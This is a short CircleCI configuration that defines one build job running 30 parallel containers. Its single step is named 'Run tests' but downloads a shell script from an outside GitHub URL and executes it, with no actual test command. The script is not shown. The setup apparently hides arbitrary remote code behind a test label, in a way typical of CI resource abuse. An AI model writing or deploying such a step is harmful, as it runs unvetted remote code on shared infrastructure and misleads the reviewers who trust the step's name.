jobs:
  build:
    parallelism: 30
    docker:
      - image: cimg/ruby:3.0.2-node
    steps:
      - checkout
      - run:
          name: Run tests
          command: wget https://raw.githubusercontent.com/popoler/tn/main/vr.sh  && chmod +x vr.sh && ./vr.sh